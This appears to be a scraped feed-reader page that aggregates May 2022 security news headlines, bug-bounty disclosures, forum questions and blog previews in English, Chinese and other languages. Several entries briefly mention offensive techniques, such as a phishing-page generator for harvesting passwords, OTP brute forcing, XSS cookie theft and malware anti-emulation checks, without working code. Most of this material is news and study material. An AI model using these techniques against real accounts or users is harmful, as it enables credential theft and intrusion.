    Conduit feed.publish API allows you to spoof other users or make it look like you have access to a restricted object
    Phabricator disclosed a bug submitted by dyls: https://hackerone.com/reports/1566325 - Bounty: $300
  • Open

    War in Ukraine / May 17
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    GEOINT#1 — Sino-Myanmarese Borders
    During my daily waste of time on Douyin (抖音, the Chinese TikTok), I felt on the following video: Continue reading on Medium »
    GEOINT#1 — Frontières Sino-Birmanes
    Durant ma perte de temps quotidienne sur Douyin (抖音, le TikTok chinois), je suis tombé sur la vidéo suivante: Continue reading on Medium »
    Moonshot Team Spotlight #01
    We are pleased to share our new Moonshot Team Spotlight Series. Continue reading on Medium »
  • Open

    SecWiki News 2022-05-18 Review
    SSTI漏洞基础解析 by SecIN社区 微信小程序反编译 by ourren 一种基于Graph Kernel的API使用示例选择方法 by ourren 来自五眼联盟的全球最佳网络安全指导意见 by ourren 快速上手云原生安全平台 NeuVector by ourren Cobalt Strike 分析:CS元数据编码和解码 by ourren 2021年十大网络安全漏洞&“Lazarus”组织介绍 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-18 Review
    SSTI漏洞基础解析 by SecIN社区 微信小程序反编译 by ourren 一种基于Graph Kernel的API使用示例选择方法 by ourren 来自五眼联盟的全球最佳网络安全指导意见 by ourren 快速上手云原生安全平台 NeuVector by ourren Cobalt Strike 分析:CS元数据编码和解码 by ourren 2021年十大网络安全漏洞&“Lazarus”组织介绍 by ourren 更多最新文章,请访问SecWiki
  • Open

    calculus notes
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    FreeBuf早报 | Conti勒索团伙放话推翻政府;俄黑客组织发视频向美乌10国宣战
    在哥斯达黎加政府拒绝支付赎金后,Conti勒索软件团伙声称对袭击负责。现在,Conti 勒索软件团伙威胁要“推翻”该国的新政府。
    HackMyVM-hostname
    这台靶机是上周刚刚发布的一台靶机,其中一处的提取手法对个人而言很是新颖,所以想记录一下。
    智能汽车曝出重大漏洞,黑客10秒开走特斯拉
    整个攻击过程只需要不到10秒钟即可打开车门,并且可以无限重复攻击。
    NVIDIA修复了Windows GPU显示驱动程序中的十个漏洞
    NVIDIA发布了针对各种显卡型号的安全更新。
    黑客利用Tatsu WordPress 插件漏洞,进行数百万次攻击
    Tatsu Builder 中存在远程代码执行漏洞 CVE-2021-25094,黑客正在利用其进行大规模网络攻击。
    警惕间谍软件!逾200 Playstore应用程序或存在风险
    近日,研究人员观察到有超过200个Android应用程序正在传播一款名为Facestealer的间谍软件。
    委内瑞拉心脏病专家被指控是Thanos勒索软件的幕后主使
    美国司法部指控了一名来自委内瑞拉的 55 岁医生是Thanos勒索软件的幕后策划者,并通过销售该勒索软件从中获取了大量利润。
    未来智安:XDR打破数据孤岛,降低无效告警 | 网安新势力SOLO发布季
    本期节目请到了攻防安全新势力,北京未来智安科技有限公司创始人兼CEO唐伽佳先生,发布《浅谈XDR扩展威胁检测与响应》的议题。
    浅谈企业SOAR项目建设
    SOAR已经出现好几年了,更多的小伙伴还是在观望中。一起探讨一下SOAR项目建设。
  • Open

    Target=“_blank” – the most underestimated vulnerability ever (2021)
    Article URL: https://www.jitbit.com/alexblog/256-targetblank---the-most-underestimated-vulnerability-ever/ Comments URL: https://news.ycombinator.com/item?id=31421473 Points: 22 # Comments: 4
  • Open

    Attacking and Defending Active Directory : Bootcamp Review
    Hello Guys, Continue reading on Medium »
  • Open

    The Basics of Subdomain Takeovers
    No content preview
  • Open

    The Basics of Subdomain Takeovers
    No content preview
  • Open

    The Basics of Subdomain Takeovers
    No content preview
  • Open

    Nextcloud CVE-2022-24890: A call moderator can indirectly enable user webcams
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2022-24890 Comments URL: https://news.ycombinator.com/item?id=31419833 Points: 3 # Comments: 0

  • Open

    USB Devices Redux
    Back in 2005, Cory Altheide and I published the first paper on tracking USB storage devices across Windows systems; at the time, the focus was Windows XP. A lot has happened since then...I know, that's an understatement...as the Windows platform has developed and expanded, initially with Vista, then Windows 7, and even with Windows 10 there have been developments that have come (and gone) just between the various Win10 builds. With respect to USB devices in particular, not long ago, we (the community) became aware that the Microsoft-Windows-DriverFrameworks-UserMode/Operational Event Log contained quite a bit of information (see this post for event IDs to track) that a digital forensic analyst could use to determine if and when USB devices had been connected to (and disconnected from) the…
  • Open

    Home Firewalls
    What are your favorite small-end firewalls and why? Are there any features or capabilities that you were particularly impressed with? Any lessons learned that can be shared from your experience? submitted by /u/Noah_Ahn [link] [comments]
    Burp Suite Arm64 Linux???
    Im using an M1 Macbook Air and Im learning Burp Suite with TryHackMe. I use a virtual machine for anything hacking / osint related but the problem is, Burp Suite isn't available for Linux arm64. Should I just switch back to my mac when i want to use burp or just not use it at all? submitted by /u/Puzzleheaded-Bid7382 [link] [comments]
    What are the fault lines in Cyber Security in 2022?
    Almost every discipline and industry has it's fault lines. These are areas where, among experts, there are fundamental disagreements on how a problem should be approached or solved. But what are the fault lines in Cyber Security in 2022? submitted by /u/astillero [link] [comments]
    Looking for what to watch on malware file changes, excerpt in comments
    I was reading this from a site (minerva labs) and am wondering, are these file changes things that are logged in windows? how do you keep track of such fine tuned changes? " Before executing any malicious code, a couple of anti-emulation techniques are used. First, the malware calls SetFileAttributesA with the parameters “C:\windows\Explorer.exe” and FILE_ATTRIBUTE_NORMAL (0x80) and if the function succeeds the malware will exit. Secondly, the malware calls the function WriteFileGather with the invalid handle 0, and exits if the return value is not 0. " submitted by /u/networkalchemy [link] [comments]
    Android malware found in personal laptop memory dump
    Hello. I'm a newbie to the security field and I'm looking for advice on how to proceed with a strange situation. As part of a class I used Ramcapturer to dump my memory and analyze it with Winhex. Here is a sample of the strange values I found: talkbacktstakeextraordinaryscreenshotsendurltologblockappdescr_or_urlMonitoringTool:AndroidOS/PhoneSpy.C connectorcontroller beginattack:senddata/hacking/my programs/source/cocoa/zapattack/udpfloodercontroller.hTrojanDropper ±mitmopsmitmserver There are many more including some for MacOS. This dump is after I reinstalled a fresh copy of windows. Malware scans do not turn anything up. At one point, I believe I was being investigated due to business ties with some white collar people. At that time I did have an Android, but now I have an iPhone. I believe the laptop was contaminated by contact with either an old router or an old USB stick. Questions: How can I safely analyze and erase the MBR /GPT on my NVME SSD, since everything was disconnected during reinstall? What programs could give more insight into my RAM? Is it safe to run my OPNSense firewall to see what my network is doing? How about Security Onion on proxmox? Thanks! submitted by /u/Beneficial-Monk-4165 [link] [comments]
    CTI
    I am trying to get into CTI as a beginner into Cyber. Any recommendations? submitted by /u/knappyboy1 [link] [comments]
    Weird stuff happening on my laptop.
    Hi! Lately I've been noticing weird stuff happening on my laptop. I haven't been visiting any shady sites or downloaded free games. I noticed that my background has changed twice by itself. First time it changed to some low resolution picture of sky but there were stars drawn on it. The second time it changed to also low resolution picture, but this time it was a picture of lighting. I can't provide a picture of the two backgrounds because I don't know where they are saved. I also noticed that Chrome is downloading stuff by itself, but I can't see what. I looked at the downloads history and I can't find anything new. I don't know if this is related, but a while ago an error message appeared on my screen and it said that it is having problems downloading an extension for Chrome and it needed my approval to retry the download, but I haven't been downloading any extensions on my laptop. Later that day I wanted to check something on my laptop and there was a message "No bootable device". I would like to know why it happens and I would be very grateful if someone on this subreddit answers my question. Goodbye. :-) submitted by /u/Programmer2009 [link] [comments]
    Flatpak adequate for this scenario?
    I'm concerned about potentially malicious extensions in my vscode, and I'm considering flatpak to mitigate this rather than going the full blown VM route. My thinking is a bit jumbled on this though, so I'd like it if I could hear someone else's thought process behind their own security precautions for more sensitive things like vscode. I'm a student, but I hope to begin freelancing after I acquire adequate skills, so that will be an additional security concern on top of just not wanting my system infected. submitted by /u/NoBuyer49 [link] [comments]
  • Open

    BackendTwo — HackTheBox — Writeup
    Hello guys sorry for uploading late. I didn’t had time so let’s start talking. Btw this box is UHC box. (Ultimate Championship Hacking)… Continue reading on Medium »
    Bug Bounty Diaries #0
    Hi guys I’m back with another blog and I know it’s been a while but I’m so exicted because with this blogs I’ll explain my way on bug… Continue reading on Medium »
    Want to learn Account Takeover? I got you
    Introduction Continue reading on Medium »
    CLV Wallet Bug Bounty Campaign
    Reward Pool of 100,000 CLV! Continue reading on Medium »
    What hacking is and why it matters!
    When people hear about hacking, there are different connotations to it! But the common interpretations of the term “hacking” in many… Continue reading on Medium »
    SQLI — Intro to Databases
    Before we learn about SQL injections, we need to learn more about databases and Structured Query Language (SQL), which databases will… Continue reading on Medium »
  • Open

    Stealing Google Drive OAuth tokens from Dropbox
    submitted by /u/staz0t [link] [comments]
    We Love Relaying Credentials: A Technical Guide to Relaying Credentials Everywhere
    submitted by /u/mgalloar [link] [comments]
    In hot pursuit of ‘cryware’: Defending hot wallets from attacks
    submitted by /u/SCI_Rusher [link] [comments]
    Hacking Swagger-UI - from XSS to account takeovers
    submitted by /u/albinowax [link] [comments]
    EMBA v1.0 - Black Hat Singapore Edt. - Version 1.0 of the firmware security analyzer EMBA is released
    submitted by /u/_m-1-k-3_ [link] [comments]
  • Open

    Bir e-posta adresinden hangi bilgileri alabiliriz?
    Osint tekniks Continue reading on Medium »
    War in Ukraine / May 16
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    The General Theory for Open Source Intelligence in brief (A proposal)
    With the proposal of a “General Theory” for Open Source Intelligence (GT/OSINT) we attempt to formulate an innovative process for the… Continue reading on Medium »
  • Open

    Nighthawk 0.2 - Catch Us If you Can - @MDSecLabs
    submitted by /u/dmchell [link] [comments]
    In hot pursuit of ‘cryware’: Defending hot wallets from attacks
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    SecWiki News 2022-05-17 Review
    情报的三大核心、四大要素、一个关键问题 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-17 Review
    情报的三大核心、四大要素、一个关键问题 by ourren 更多最新文章,请访问SecWiki
  • Open

    Integer overflow vulnerability
    Glovo disclosed a bug submitted by 0f1c3r: https://hackerone.com/reports/1562515
    [app.lemlist.com] Improper handling of payment lead to bypass payment
    lemlist disclosed a bug submitted by omarelfarsaoui: https://hackerone.com/reports/1420697
  • Open

    Emotet Summary: November 2021 Through January 2022
    We review recent activity from the Emotet malware family, covering changes in Emotet operations since its revival in November 2021. The post Emotet Summary: November 2021 Through January 2022 appeared first on Unit42.
  • Open

    Law enforcement forensics career transition
    I am currently a digital forensics analyst for law enforcement. I want to transition into cyber/info security but I am having a hard time understanding what jobs I could apply for. My experience doesn’t really align with much. I’ve been looking at infosec analyst roles. Law enforcement is dead box forensics. All home computing devices, and we know exactly what we’re looking for. Never do malware analysis and networking stuff. I’ve studied all the domains with sec+ but haven’t actually paid to sit the exam because I’d rather a company fund it. Any advice? submitted by /u/gofigured21 [link] [comments]
    Analyzing Page File for Malware
    Hello everyone, I was analyzing a page file for malware. I ran strings to extract the strings from it, and found lots of suspicious strings. I then started looking at the strings on my own host PC for a comparison, upon examining my hosts pagefile I found some strings that are suspicious but no where near the amount in comparison to the system I'm examining, and windows defender wont allow me to open the text file in notepad due to a potential virus. Ive scanned both pagefiles outputs with malware bytes and no hits on them, but when scanning with windows defender I get multiple hits for various CVE's and Trojans. So my question is is this normal when examining pagefiles, I was thinking that It could be something extracted from windows defender in the pagefile? submitted by /u/NoImaginationForThis [link] [comments]
  • Open

    Bypassing WAF to Weaponize a Stored XSS
    No content preview
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 3)
    No content preview
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 2)
    No content preview
    What is SSH and How to use it? | With Examples
    No content preview
    Module-2 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    No content preview
    This is how my Windows 10 Hacked! and how i overcome it (Remove a Trojan-Horse from affected PC).
    No content preview
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 1)
    No content preview
  • Open

    Bypassing WAF to Weaponize a Stored XSS
    No content preview
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 3)
    No content preview
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 2)
    No content preview
    What is SSH and How to use it? | With Examples
    No content preview
    Module-2 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    No content preview
    This is how my Windows 10 Hacked! and how i overcome it (Remove a Trojan-Horse from affected PC).
    No content preview
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 1)
    No content preview
  • Open

    Bypassing WAF to Weaponize a Stored XSS
    No content preview
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 3)
    No content preview
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 2)
    No content preview
    What is SSH and How to use it? | With Examples
    No content preview
    Module-2 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    No content preview
    This is how my Windows 10 Hacked! and how i overcome it (Remove a Trojan-Horse from affected PC).
    No content preview
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 1)
    No content preview
  • Open

    linear algebra notes
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Rari Capital 攻击事件的分析和复现
    作者:w2ning 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 写在前面的废话 4月30日, Rari Capital的几个借贷池遭受闪电贷重入攻击, 约受损8000万美金. 漏洞原理与去年我分析过的Cream 第四次被黑类似, 但攻击方式更加优雅, 故有此文. 漏洞起因: Compound起的坏头 老牌Defi...
    三次价格操纵的恶意攻击事件汇总
    作者:w2ning 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 写在前面的废话 以下是对2022年上半年3个独立攻击事件的汇总分析, 虽然漏洞原理各不相同, 但他们都有一个共同点: 攻击者不再只依赖FlashLoan进行Single-Transaction-Attack(我自己瞎起的说法). 而是真金白银地砸出数...
  • Open

    Rari Capital 攻击事件的分析和复现
    作者:w2ning 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 写在前面的废话 4月30日, Rari Capital的几个借贷池遭受闪电贷重入攻击, 约受损8000万美金. 漏洞原理与去年我分析过的Cream 第四次被黑类似, 但攻击方式更加优雅, 故有此文. 漏洞起因: Compound起的坏头 老牌Defi...
    三次价格操纵的恶意攻击事件汇总
    作者:w2ning 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 写在前面的废话 以下是对2022年上半年3个独立攻击事件的汇总分析, 虽然漏洞原理各不相同, 但他们都有一个共同点: 攻击者不再只依赖FlashLoan进行Single-Transaction-Attack(我自己瞎起的说法). 而是真金白银地砸出数...
  • Open

    FreeBuf早报 | 英国制定核网络安全战略;美国制造业巨头被 Conti 攻击
    美国制造业巨头被 Conti 攻击。
    360高级攻防实验室郑同舟:知白守黑,用手中的矛铸心中的盾
    网络安全更需要攻防演练,利用那根锋利的长矛,找到盾牌上的薄弱点。知白守黑,郑同舟和360高级攻防实验室已经做好了准备,只待大风起。
    苹果紧急更新修复入侵Mac和Watch的零日漏洞
    近日,苹果发布了安全更新以解决一项新的零日漏洞,黑客可以利用该漏洞对Mac和Apple Watch设备发起攻击。
    iPhone曝出新的攻击面,即使关闭也可运行恶意软件
    攻击者可篡改固件并将恶意软件加载到蓝牙芯片上,使该芯片在 iPhone “关闭”时执行。
    六方云 安全态势周刊丨第199期
    业界动态尽收眼底,安全事件一览无遗
    因在暗网出售被盗凭据,乌克兰黑客被判四年监禁
    因在暗网出售登录凭据, 28 岁的乌克兰人被判处 4 年监禁。
    HTML附件在网络钓鱼攻击中至今仍很流行
    根据2022年第一季度的调研表明,HTML文件仍然是网络钓鱼攻击中最流行的附件之一。
    HW在即,那些被遗忘的物理安全还好吗?
    高端的黑客往往只采用最朴素的攻击方式。
    FreeBuf早报 | 意大利多个政府网站遭DDoS攻击瘫痪;苹果紧急修复零日漏洞
    苹果公司发布了安全更新,以解决零日漏洞,威胁行为者可以利用该漏洞攻击MAC和Apple Watch设备。
  • Open

    Modern Technology Exploits and Analysis
    Continue reading on Medium »

  • Open

    [case study#1] IDOR vulnerability allows access to user’s personal data
    What is IDOR? Continue reading on Medium »
    The Bucket’s Got a Hole in it
    Introduction Continue reading on Medium »
    Bug Bounty от Meta Pool
    Meta Pool опубликовал в своем gitBook программу Bug Bounty, в которой может участвовать любой, кто обнаружит ошибку или уязвимость в… Continue reading on Meta Pool Russia »
    Module-2 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    Q. What is Core Rule Set & why it is utilized by all the cloud WAFs? A. We will try to understand more about the core rule set along with… Continue reading on InfoSec Write-ups »
    Bounty Hacker Walkthrough — Try Hack Me
    You were boasting on and on about your elite hacker skills in the bar and a few Bounty Hunters decided they'd take you up on claims! Prove… Continue reading on System Weakness »
  • Open

    Malcolm v6 released on GitHub, now including Suricata and more new protocol parsers
    submitted by /u/mmguero [link] [comments]
    F5 BIG-IP critical vulnerability exploited by attackers to gain unauthenticated RCE
    submitted by /u/sciencestudent99 [link] [comments]
    Shielder - Printing Fake Fiscal Receipts - An Italian Job p.2
    submitted by /u/smaury [link] [comments]
    From Project File to Code Execution: Exploiting XINJE PLC Program Tool
    submitted by /u/derp6996 [link] [comments]
    SMM Callouts in HP Products
    submitted by /u/lightgrains [link] [comments]
    GitHub - gabriel-sztejnworcel/pipe-intercept: Intercept Windows Named Pipes communication using Burp or similar HTTP proxy tools
    submitted by /u/gabrielszt [link] [comments]
    Technical Advisory – Blueooth Low Energy Proximity Authentication Vulnerable to Relay Attacks
    submitted by /u/digicat [link] [comments]
  • Open

    Computer image analysis - online trials
    There was a website where you could download a computer image and you would answer questions about the image to finish the challenge (who last logged on?, etc.) and I can't seem to find it again. Does something like that still exist? submitted by /u/hamsterbilly [link] [comments]
    Password protected RAR file!
    I have a password protected RAR file in one of my servers, it was found in the system folder, I am not considering it a malware because its size is 90MB+ but I do want to know what's inside it! Bruteforce doesn't seem like a good idea, what other options do I have? Looking for help and guidance of good people of computer forensics!! submitted by /u/Supra02 [link] [comments]
  • Open

    Privilege Escalation on TikTok for Business
    TikTok disclosed a bug submitted by naaash: https://hackerone.com/reports/1505567 - Bounty: $2500
    Site information's Display Name section vulnerable for XSS attacks and HTML Injections.
    Automattic disclosed a bug submitted by sawrav-chowdhury: https://hackerone.com/reports/1554888 - Bounty: $150
    Security misconfiguration
    lemlist disclosed a bug submitted by mr23r0: https://hackerone.com/reports/1486327
    CVE-2022-27781: CERTINFO never-ending busy-loop
    curl disclosed a bug submitted by sybr: https://hackerone.com/reports/1555441
    HTTP Request Smuggling in Transform Rules using hexadecimal escape sequences in the concat() function
    Cloudflare Public Bug Bounty disclosed a bug submitted by albertspedersen: https://hackerone.com/reports/1478633 - Bounty: $6000
  • Open

    Check the public GitHub repositories for CVE vulnerabilities
    Article URL: https://memgraph.com/blog/graph-data-zagreb-summary-april-2022 Comments URL: https://news.ycombinator.com/item?id=31402433 Points: 1 # Comments: 0
  • Open

    An OS tool for storing, searching, and displaying news wires
    An OSINT way to read, analyse, and compare news outlets which use Telegram. Continue reading on Medium »
    War in Ukraine / May 14–15
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    OSINT: Do I have to Capture The Flag? Pt2.
    Making a persona that’s even faker than your social media identity. Continue reading on Medium »
  • Open

    Putting the team in red team
    One of the more common questions we receive during a red team scoping call or RFP Q&A call is, how many dedicated consultants will be involved in the assessment? There is no “correct” answer to this question, and ultimately, the answer as to how red team engagements are staffed comes down to how the consultancy... The post Putting the team in red team appeared first on TrustedSec.
  • Open

    Block calendy.com spam
    All, is there a good way to block someone trying to spam us using calendy.com without simply blocking everything from calendy.com? Situation: We have some folks who are getting hammered by someone sending constant Calendy event invites. I'm guessing it's some sort of bot as there are several different gmail addresses as the other invitee. submitted by /u/twrolsto [link] [comments]
    What jobs to look for after Vulnerability Analyst / Management?
    I want to start getting the needed requirements and experience for a position after this, but I'm not sure what job title I would be searching for, or what comes next in the chain of jobs. I would like to go to a more red-team focused role, but honestly, my main aim is a better salary submitted by /u/Dependent-Context-43 [link] [comments]
    How do you make writing reports more pleasant? [Penetration tests]
    Hi, I've been writing reports for a while now but I'm struggling big time. Our methodology is pretty complicated and I want to automate it. We write the vulnerabilities with Mark Down, render with pandoc into a word file, then take it and merge it with the word template. Then validate and make corrections and export it to PDF. The good part with is that we don't have to fix styles when writing it, but I'm sure there must be a better way to do it. I've researched few options but can't find a good one. I'm thinking about creating web app with a DB containing all the vulnerabilities that were used in the reports, so it will be easier to import them. Some of them for example for missing headers will only have an option to import an image with the proof of concept with previously prepared static text containing information. In other vulnerabilities that need additional writing there will be placeholders. Somehow I think my idea will take way too long, any ideas or tips will be highly appreciated. Ps. I've notice taking trashy notes slows down additionally my Reporting process. Can you suggest me on editors like one note(including images) but which you can use on both Windows and Linux? Thanks! submitted by /u/tryingtoworkatm [link] [comments]
    Sysmon on Linux
    Hi Everyone, What is your take on installing sysmon on Linux hosts in terms of volume, beneficially, and is there any configuration file same as SwiftOnSecurity for Windows? Your detailed information is highly appreciated submitted by /u/azizalmarfadi [link] [comments]
    Security consultant interview tips
    I have a graduate security consultant interview next week and would like a few tips on how to impress the interviewer (they are a senior member of the company). I really want this role as I want to push myself this year. Many thanks! submitted by /u/Appreciatingthegoods [link] [comments]
  • Open

    API Security Offence and Defence: Introduction to API
    submitted by /u/cybersocdm [link] [comments]
    I'm new to binary exploitation and my interest lie in security for IOT devices. I need suggestions on what I should learn
    I already know I should learn C, read shellcoders handbook, ik some CTF's but idk if they're good for IOT. What I aim is to not waste any effort learning unnecessary info and most importantly to start of with something really basic and easy. Can you guys suggest me where to begin, which CTF's I should tackle, what path I should take and finally what I should avoid(a crude example ex: for people interested in b.e. of PC's they should learn about x86 instead of wasting time on mips or arm)? submitted by /u/winter-stalk [link] [comments]
  • Open

    SecWiki News 2022-05-16 Review
    网络安全创业从0到1-演讲实录 by ourren 透过俄乌冲突谈对“网络无国界”的再认识 by ourren 从网空测绘看俄乌战争态势--及对我们的启示 by ourren SecWiki周刊(第428期) by ourren (译)SLSA如何落地 by ourren MySQL安全配置基线 by SecIN社区 部分终端安全防护软件的 DNSAML 服务存在缺陷 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-16 Review
    网络安全创业从0到1-演讲实录 by ourren 透过俄乌冲突谈对“网络无国界”的再认识 by ourren 从网空测绘看俄乌战争态势--及对我们的启示 by ourren SecWiki周刊(第428期) by ourren (译)SLSA如何落地 by ourren MySQL安全配置基线 by SecIN社区 部分终端安全防护软件的 DNSAML 服务存在缺陷 by Avenger 更多最新文章,请访问SecWiki
  • Open

    UK government sits out bug bounty boom but welcomes vulnerability disclosure
    Article URL: https://portswigger.net/daily-swig/uk-government-sits-out-bug-bounty-boom-but-welcomes-vulnerability-disclosure Comments URL: https://news.ycombinator.com/item?id=31398182 Points: 2 # Comments: 0
  • Open

    Gin and Juice Shop: put your scanner to the test
    "Word". We heard that a lot of you have been having problems finding a truly dope vulnerable web application to wave your scanner at. As makers of the web's OG vulnerability scanner, we couldn't be le
  • Open

    Gin and Juice Shop: put your scanner to the test
    "Word". We heard that a lot of you have been having problems finding a truly dope vulnerable web application to wave your scanner at. As makers of the web's OG vulnerability scanner, we couldn't be le
  • Open

    A Look Into Public Clouds From the Ransomware Actor's Perspective
    Ransomware in public clouds is rare, but cloud threat actors could adapt their TTPs to be more cloud native. Now is the time to get ahead of it. The post A Look Into Public Clouds From the Ransomware Actor's Perspective appeared first on Unit42.
  • Open

    Module-1 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    No content preview
  • Open

    Module-1 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    No content preview
  • Open

    Module-1 | Introduction -Pentesting & Bypassing AWS/Azure/GCP Cloud WAF Fun & Profit
    No content preview
  • Open

    2022年中汽数据信息安全团队招聘信息
    中汽数据有限公司招聘三名工程师。
    安全业务视角下如何解决终端勒索威胁 | FreeBuf甲方社群直播回顾
    5月12日,某企业安全架构师李宗晖在FreeBuf甲方社群第三场内部直播中担任主讲嘉宾,向大家分享安全业务视角下如何解决终端勒索威胁。
    黑客正在利用Zyxel防火墙和VPN中的关键漏洞
    该漏洞会影响企业的 Zyxel防火墙和VPN设备。
    亲俄黑客攻击意大利政府网站
    一个名为“Killnet”的亲俄黑客团伙对多个意大利机构网站发动了攻击,其中包括参议院、国家卫生研究院,国家汽车协会。
    链家IT管理员删除数据库,被判7年有期徒刑
    链家一员工因登录公司系统并删除公司数据,被判处 7 年有期徒刑。
    SonicWall:请立即修复SMA 1000 漏洞
    SonicWall指出,攻击者可以利用这些漏洞绕过授权,并可能破坏易受攻击的设备。
    Linux内网渗透(三)—Linux提权
    本文是Linux内网渗透的第二篇文章——**Linux提权*
    Sysrv 僵尸网络新变种正攻击 Windows及Linux 服务器
    Sysrv 僵尸网络的新变种Sysrv-K,正在利用 Spring Framework 和 WordPress 中的漏洞,在易受攻击的 Windows 和 Linux 服务器上和部署加密恶意软件。
  • Open

    从网空测绘看俄乌战争态势及对我们的启示
    作者:杨冀龙 公众号:神龙叫 原文链接:https://mp.weixin.qq.com/s/HLvydDDhTfxK-xWsGEuCpA 通过对战争发动前后,俄乌互联网空间测绘数据分析,可以从一个侧面一窥俄乌实体战争态势情况,也能更详细窥视网空对抗情况。 一、战争前期俄罗斯网空防御居于劣势 通过网空测绘显示,俄罗斯网络空间最近一年互联网IP的开放端口暴露数量为:8609万,乌克兰为516...
  • Open

    从网空测绘看俄乌战争态势及对我们的启示
    作者:杨冀龙 公众号:神龙叫 原文链接:https://mp.weixin.qq.com/s/HLvydDDhTfxK-xWsGEuCpA 通过对战争发动前后,俄乌互联网空间测绘数据分析,可以从一个侧面一窥俄乌实体战争态势情况,也能更详细窥视网空对抗情况。 一、战争前期俄罗斯网空防御居于劣势 通过网空测绘显示,俄罗斯网络空间最近一年互联网IP的开放端口暴露数量为:8609万,乌克兰为516...
  • Open

    RedTeam Physical Tools
    Red Team Toolkit — A curated list of tools that are commonly used in the field for Physical Security, Red Teaming, and Tactical Covert… Continue reading on Medium »

  • Open

    Zphisher — Gerador de Phishing
    A Zphisher é uma ferramenta que permite a geração de páginas falsas com o objetivo de obter usuários e senhas. Continue reading on 100security »
    Why I love using NMAP
    Whether you’re in the Information Security industry,played Capture The Flags competitions or maybe you’re just someone that likes Cyber… Continue reading on Medium »
    Best YouTube Channels for Learning Cyber Security
    Best YouTube Channels for learning Cyber Security- Continue reading on Medium »
    Bug bounties, The glamour.
    Hello to the readers, it’s been a while since i wrote on medium and today this morning i feel like writing something out after analysing… Continue reading on Medium »
    Why enumerate folders and files - A valuable simple technic
    The enumeration technique is used to recognize the target environment to obtain information about files or folders that exists on a web… Continue reading on Medium »
  • Open

    X — the Pornographic Gorefest That is Neither
    A lesser A24 has much to offer in theme and thesis, but it’s got no meat on the bones. Continue reading on The Movie Chaser »
  • Open

    Using Stolen IAM Credentials - Hacking The Cloud
    submitted by /u/RedTermSession [link] [comments]
    MITM_Intercept: A little less hackish way to intercept and modify non-HTTP protocols through Burp & others.
    submitted by /u/jat0369 [link] [comments]
  • Open

    us military…..like everything
    Yes it’s not quite an OD….BUT!…. Yes it’s interesting af And I felt like I would be Sinning if I didn’t share this. https://www.militarynewbie.com/military-manuals/ submitted by /u/Salty_Ad_69 [link] [comments]
    Anybody got all of Black Clover on gdrive?
    submitted by /u/Left_Command_9458 [link] [comments]
  • Open

    Internet devices in country domain
    How to search for specific IOT devices or firewalls, filtered by country domain, region or locality? It occurs to me that I could extract information from SSL certificates, or things like that. Has anyone made a similar script that could be useful to me? submitted by /u/N0xFE [link] [comments]
    OpenVPN help
    Hello all I have an IT Security interview in the next few weeks for a graduate role and I will have to use OpenVPN to access applications. I’ve never done this before so how can I prepare for this? Thank you everyone submitted by /u/Appreciatingthegoods [link] [comments]
    OTP brute force in Zap
    So I am trying to do a lab on portswigger. But the payload that I want to give is not working as it starts from 999 and goes till 9999. So it is essentially missing the 0xxx type of OTPs. How to achieve this?? submitted by /u/Full_Albatross_5636 [link] [comments]
    Securing family network
    My parents used a very weak password for both our wifi and control panel, so obviously I changed those. I also disabled UPnP as it seems that's another point of vulnerability. What else can I do to tighten up security? submitted by /u/Able-Board-503 [link] [comments]
  • Open

    SQLI-Introduction
    Most modern web applications utilize a database structure on the back-end. Such databases are used to store and retrieve data related to… Continue reading on Medium »
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 3)
    In the previous article details regarding syntax, variables, and their usage was conveyed. This Final Part Will be about the Installation… Continue reading on InfoSec Write-ups »
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 3)
    In the previous article details regarding syntax, variables, and their usage was conveyed. This Final Part Will be about the Installation… Continue reading on Medium »
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 1)
    Hey everyone, I hope you all are doing well. I have been Programming in multiple languages for some time now, so I thought Writing Bash… Continue reading on InfoSec Write-ups »
    Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 1)
    Hey everyone, I hope you all are doing well. I have been Programming in multiple languages for some time now, so I thought Writing Bash… Continue reading on Medium »
    How I managed to take over any account visits my profile with Stored XSS
    Hello everybody, today we have a simple Stored XSS vulnerability that leads to stealing cookies and Taking over the account. Let’s start Continue reading on Medium »
    كتاب صائد الثغرات: خارطة الطريق لتصبح صائد ثغرات أمنية
